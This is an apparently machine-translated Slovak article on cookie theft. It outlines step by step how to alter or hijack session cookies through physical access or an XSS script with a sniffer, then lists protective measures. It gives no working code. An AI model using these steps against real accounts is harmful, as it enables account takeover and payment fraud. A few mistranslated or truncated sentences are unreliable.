Všetky cookies sú uložené a odoslané na webový server (z ktorého „prišli“) bez akýchkoľvek zmien – vo svojej pôvodnej podobe – s rovnakými hodnotami, reťazcami a inými údajmi. Zámerná úprava ich parametrov sa nazýva nahradenie súborov cookie. Inými slovami, pri výmene cookies útočník predstiera, že zbožňuje. Napríklad pri platbe v internetovom obchode súbor cookie zmení sumu platby smerom nadol – dochádza tak k „úspore“ pri nákupoch.

Ukradnuté súbory cookie relácie na sociálnej sieti z účtu niekoho iného sa „vložia“ do inej relácie a na iný počítač. Vlastník ukradnutých cookies získa úplný prístup k účtu obete (korešpondencia, obsah, nastavenia stránky), pokiaľ je na svojej stránke.

„Úprava“ cookies sa vykonáva pomocou:

• Funkcie „Spravovať súbory cookie...“ v prehliadači Opera;
• Doplnky Cookies Manager a Advanced Cookie Manager pre FireFox;
• nástroje IECookiesView (iba Internet Explorer);
• textový editor, ako je AkelPad, NotePad alebo Windows Notepad.

Fyzický prístup k údajom

Veľmi jednoduchá implementačná schéma pozostávajúca z niekoľkých krokov. Je to však účinné iba vtedy, ak je počítač obete s otvorenou reláciou, napríklad VKontakte, ponechaný bez dozoru (a na dlhú dobu!):

Do panela s adresou prehliadača sa zadá funkcia javascript na zobrazenie všetkých uložených súborov cookie.

Po stlačení „ENTER“ sa všetky zobrazia na stránke.

Cookies sa skopírujú, uložia do súboru a potom sa prenesú na flash disk.

Na inom počítači sa súbory cookie nahradia v novej relácii.

Prístup k účtu obete je povolený.

Hackeri spravidla používajú vyššie uvedené nástroje (+ ďalšie) v kombinácii (keďže úroveň ochrany na mnohých webových zdrojoch je dosť vysoká), ako aj oddelene (keď sú používatelia nadmerne naivní).

XSS + sniffer

Vytvorí sa XSS skript, ktorý špecifikuje adresu online sniffera (buď domáceho alebo konkrétnej služby).

Škodlivý kód sa ukladá s príponou .img (formát obrázka).

Tento súbor sa potom odovzdá na webovú stránku, chat alebo osobnú správu, kde bude útok vykonaný.

Používateľovu pozornosť priťahuje vytvorená „pasca“ (tu vstupuje do platnosti sociálne inžinierstvo).

Ak sa pasca spustí, sniffer zachytí súbory cookie z prehliadača obete.

Útočník otvorí protokoly sniffer a získa ukradnuté cookies.

Ďalej vykoná substitúciu na získanie práv vlastníka účtu pomocou vyššie uvedených nástrojov.

Ochrana cookies pred hackovaním

Použite šifrované pripojenie (pomocou vhodných protokolov a metód zabezpečenia).

Neodpovedajte na pochybné odkazy, obrázky alebo lákavé ponuky, aby ste sa zoznámili s „novým slobodným softvérom“. Najmä od cudzích ľudí.

Používajte iba dôveryhodné webové zdroje.

Ukončite autorizovanú reláciu kliknutím na tlačidlo „Odhlásiť sa“ (nielen zatvorením karty!). Najmä ak ste sa do svojho účtu neprihlásili z osobného počítača, ale napríklad z počítača v internetovej kaviarni.

Nepoužívajte v prehliadači funkciu „Uložiť heslo“. Uložené registračné údaje výrazne zvyšujú riziko krádeže. Nebuďte leniví, nestrácajte pár minút času zadaním hesla a prihlásením na začiatku každej relácie.

Po surfovaní po webe – návšteve sociálnych sietí, fór, chatov, webových stránok – odstráňte uložené súbory cookie a vymažte vyrovnávaciu pamäť prehliadača.

Pravidelne aktualizujte prehliadače a antivírusový softvér.

Používajte rozšírenia prehliadača, ktoré chránia pred útokmi XSS (napríklad NoScript pre FF a Google Chrome).

Pravidelne na účtoch.

A čo je najdôležitejšie, nestrácajte ostražitosť a pozornosť pri relaxe alebo práci na internete!